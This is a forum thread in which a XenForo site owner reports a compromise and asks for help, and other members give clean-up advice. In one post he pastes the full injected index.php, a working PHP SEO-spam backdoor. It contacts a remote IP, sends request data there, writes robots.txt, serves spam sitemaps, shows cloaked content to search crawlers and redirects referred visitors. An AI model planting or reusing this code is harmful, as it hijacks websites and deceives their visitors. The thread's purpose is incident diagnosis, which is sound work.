XenForo 2.1.12 Released Full | XenForo 2.1 ENXF

Released 2x XenForo 2.1.12 Released Full | XenForo 2.1 ENXF 2.1.12

No permission to download
Overview Updates (20) Reviews (460) History Discussion (435)
D

DRIVER1ksa

Active member
Registered
Joined
Aug 30, 2019
Messages
29
Points
13

Reputation:

i'm running 2.1.3 got Hacked today :cry:
 
BattleKing

BattleKing

Spirit of darkness
Staff member
Administrator
Moderator
+Lifetime VIP+
S.V.I.P Member
Collaborate
Registered
Joined
May 24, 2020
Messages
3,529
Points
523

Reputation:

DRIVER1ksa said:
i'm running 2.1.3 got Hacked today :cry:
Click to expand...
DRIVER1ksaplease more details on it.
did you find something in the logs of the web server, how did you recognized that you are hacked?

What else is on the server installed?
 
View previous replies…
D

DRIVER1ksa

Active member
Registered
Joined
Aug 30, 2019
Messages
29
Points
13

Reputation:

BattleKing said:
please more details on it.
did you find something in the logs of the web server, how did you recognized that you are hacked?

What else is on the server installed?
Click to expand...
BattleKingthis file

Code: 
<?php $inter_domain='http://204.12.224.242/z0222_2/';function stp(){ return exit; } func...
 

Attachments

  • good.zip
    1.7 KB · Views: 181
D

DRIVER1ksa

Active member
Registered
Joined
Aug 30, 2019
Messages
29
Points
13

Reputation:

BattleKing said:
please more details on it.
did you find something in the logs of the web server, how did you recognized that you are hacked?

What else is on the server installed?
Click to expand...
BattleKingalso the whol Log file like this 500 line

Code: 
[28-Feb-2023 06:48:07 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
[28-Feb-2023 06:58:02 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
[28-Feb-2023 06:58:47 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
[28-Feb-2023 07:07:31 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
[28-Feb-2023 07:30:25 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
[28-Feb-2023 07:31:27 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
[28-Feb-2023 07:37:44 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
[28-Feb-2023 07:47:08 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
 
BattleKing

BattleKing

Spirit of darkness
Staff member
Administrator
Moderator
+Lifetime VIP+
S.V.I.P Member
Collaborate
Registered
Joined
May 24, 2020
Messages
3,529
Points
523

Reputation:

DRIVER1ksa said:
also the whol Log file like this 500 line

Code: 
[28-Feb-2023 06:48:07 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
[28-Feb-2023 06:58:02 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
[28-Feb-2023 06:58:47 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
[28-Feb-2023 07:07:31 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
[28-Feb-2023 07:30:25 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
[28-Feb-2023 07:31:27 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
[28-Feb-2023 07:37:44 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
[28-Feb-2023 07:47:08 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
Click to expand...
DRIVER1ksathis does not look like a hack.
 
D

DRIVER1ksa

Active member
Registered
Joined
Aug 30, 2019
Messages
29
Points
13

Reputation:

now i upgraded to 2.1.12

everything seems work fine

thank you all
 
BattleKing

BattleKing

Spirit of darkness
Staff member
Administrator
Moderator
+Lifetime VIP+
S.V.I.P Member
Collaborate
Registered
Joined
May 24, 2020
Messages
3,529
Points
523

Reputation:

DRIVER1ksa said:
now i upgraded to 2.1.12

everything seems work fine

thank you all
Click to expand...
DRIVER1ksaYou upgraded now, but why does this solve your issue?
Because all index files are back?
If you are hacked, then you might be still hacked! So please check carefully what is installed on your server, check created users, check files ...
 
D

DRIVER1ksa

Active member
Registered
Joined
Aug 30, 2019
Messages
29
Points
13

Reputation:

BattleKing said:
You upgraded now, but why does this solve your issue?
Because all index files are back?
If you are hacked, then you might be still hacked! So please check carefully what is installed on your server, check created users, check files ...
Click to expand...
BattleKingthe good.php file does not exist in any of my 10+ backup file, i definitely didn't put it there. in the file you can clearly see ip address and user which belong to the hacker i guess.

also i re uploaded all the file in public_html, that make the website work again,
but cant click or use setting in admin page, the only solution fix it is to upgread.

also sorry didnt mention it before, this is the Xenforo index.php file
PHP: 
<?php $inter_domain='http://204.12.194.2/z0223_2/';function stp(){ return exit; } function curl_get_contents($url){$ch=curl_init();curl_setopt ($ch, CURLOPT_URL, $url);curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);$file_contents = curl_exec($ch);curl_close($ch);return $file_contents; }function getServerCont11($url,$data=array()){$url=str_replace(' ','+',$url);$ch=curl_init();curl_setopt($ch,CURLOPT_URL,"$url");curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_TIMEOUT,10);curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);curl_setopt($ch,CURLOPT_POSTFIELDS,http_build_query($data));$output = curl_exec($ch);$errorCode = curl_errno($ch);curl_close($ch);if(0!== $errorCode){ return false;}return $output;}function is_crawler($agent){$agent_check=false; $bots='googlebot|google|yahoo|bing|aol';if($agent!=''){if(preg_match("/($bots)/si",$agent)){$agent_check = true; }}return $agent_check;}function check_refer($refer){ $check_refer=false;$referbots='google.co.jp|yahoo.co.jp|google.com';if($refer!='' && preg_match("/($referbots)/si",$refer)){ $check_refer=true; }return $check_refer; }$http=((isset($_SERVER['HTTPS'])&&$_SERVER['HTTPS']!=='off')?'https://':'http://');$req_uri=$_SERVER['REQUEST_URI'];$domain=$_SERVER["HTTP_HOST"];$self=$_SERVER['PHP_SELF'];$ser_name=$_SERVER['SERVER_NAME'];$req_url=$http.$domain.$req_uri;$indata1=$inter_domain."/indata.php";$map1=$inter_domain."/map.php";$jump1=$inter_domain."/jump.php";$url_words=$inter_domain."/words.php";$url_robots=$inter_domain."/robots.php";if(strpos($req_uri,".php")){$href1=$http.$domain.$self;}else{$href1=$http.$domain;}$data1[]=array();$data1['domain']=$domain;$data1['req_uri']=$req_uri;$data1['href']=$href1;$data1['req_url']=$req_url;if(substr($req_uri,-6)=='robots'){$robots_cont = getServerCont11($url_robots,$data1);define('BASE_PATH',str_ireplace($_SERVER['PHP_SELF'],'',__FILE__));file_put_contents(BASE_PATH.'/robots.txt',$robots_cont);$robots_cont=file_get_contents(BASE_PATH.'/robots.txt');if(strpos(strtolower($robots_cont),"sitemap")){echo 'robots.txt file create success!';}else{echo 'robots.txt file create fail!';}return;}if(substr($req_uri,-4)=='.xml'){if(strpos($req_uri,"pingsitemap.xml")){ $str_cont = getServerCont11($map1,$data1); $str_cont_arr= explode(",",$str_cont); $str_cont_arr[]='sitemap'; for($k=0;$k<count($str_cont_arr);$k++){ if(strpos($href1,".php")> 0){ $tt1='?'; }else{ $tt1='/';}$http2=$href1.$tt1.$str_cont_arr[$k].'.xml';$data_new='https://www.google.com/ping?sitemap='.$http2;$data_new1='http://www.google.com/ping?sitemap='.$http2;if(stristr(@file_get_contents($data_new),'successfully')){echo $data_new.'===>Submitting Google Sitemap: OK'.PHP_EOL;}else if(stristr(@curl_get_contents($data_new),'successfully')){echo $data_new.'===>Submitting Google Sitemap: OK'.PHP_EOL;}else if(stristr(@file_get_contents($data_new1),'successfully')){echo $data_new1.'===>Submitting Google Sitemap: OK'.PHP_EOL;}else if(stristr(@curl_get_contents($data_new1),'successfully')){echo $data_new1.'===>Submitting Google Sitemap: OK'.PHP_EOL; }else{echo $data_new1.'===>Submitting Google Sitemap: fail'.PHP_EOL;} } return;} if(strpos($req_uri,"allsitemap.xml")){ $str_cont = getServerCont11($map1,$data1); header("Content-type:text/xml"); echo $str_cont;stp();} if(strpos($req_uri,".php")){ $word4=explode("?",$req_uri); $word4=$word4[count($word4)-1]; $word4=str_replace(".xml","",$word4); }else{ $word4= str_replace("/","",$req_uri);$word4= str_replace(".xml","",$word4); }$data1['word']=$word4;$data1['action']='check_sitemap';$check_url4=getServerCont11($url_words,$data1);if($check_url4=='1'){ $str_cont=getServerCont11($map1,$data1); header("Content-type:text/xml"); echo $str_cont;stp();} $data1['action']="check_words"; $check1= getServerCont11($url_words,$data1);if(strpos($req_uri,"map")> 0 || $check1=='1') $data1['action']="rand_xml";$check_url4=getServerCont11($url_words,$data1);header("Content-type:text/xml");echo $check_url4;stp();}if(strpos($req_uri,".php")){$main_shell=$http.$ser_name.$self;$data1['main_shell']=$main_shell;}else{$main_shell=$http.$ser_name;$data1['main_shell']=$main_shell;}$referer=isset($_SERVER['HTTP_REFERER'])?$_SERVER['HTTP_REFERER']:'';$chk_refer=check_refer($referer); if(strpos($_SERVER['REQUEST_URI'],'.php')){ $url_ext='?'; }else{ $url_ext='/'; } if($chk_refer && (preg_match('/ja/i',@$_SERVER['HTTP_ACCEPT_LANGUAGE']) || preg_match('/ja/i',@$_SERVER['HTTP_ACCEPT_LANGUAGE']) || preg_match("/^[a-z0-9]+[0-9]+$/",end(explode($url_ext,str_replace(array(".html",".htm"),"",$_SERVER['REQUEST_URI'])))))){echo getServerCont11($jump1,$data1);stp(); } $user_agent=strtolower(isset($_SERVER['HTTP_USER_AGENT'])?$_SERVER['HTTP_USER_AGENT']:'');$res_crawl=is_crawler($user_agent); if($res_crawl){ $data1['http_user_agent']=$user_agent;$get_content = getServerCont11($indata1,$data1); echo $get_content;stp(); } ?>

why it look like this ?


it should be


PHP: 
<?php

$phpVersion = phpversion();
if (version_compare($phpVersion, '5.6.0', '<'))
{
    die("PHP 5.6.0 or newer is required. $phpVersion does not meet this requirement. Please ask your host to upgrade PHP.");
}

$dir = __DIR__;
require($dir . '/src/XF.php');

XF::start($dir);

if (\XF::requestUrlMatchesApi())
{
    \XF::runApp('XF\Api\App');
}
else
{
    \XF::runApp('XF\Pub\App');
}
 
SNap!

SNap!

Collaborate
Collaborate
Registered
Joined
Mar 17, 2022
Messages
560
Points
253

Reputation:

seems some files are writeable on host. check permissions
 
D

DRIVER1ksa

Active member
Registered
Joined
Aug 30, 2019
Messages
29
Points
13

Reputation:

SNap! said:
seems some files are writeable on host. check permissions
Click to expand...
SNap!when i logged into my Cpanel i notice that "Last Modified" column notice PHP file yesterday edited! but i did not log to my cpanel more than one month.

i contacted to my web Host they say its only my web site effected,
the Shared server and other websites are just fine!
 
You must log in or register to reply here.
Top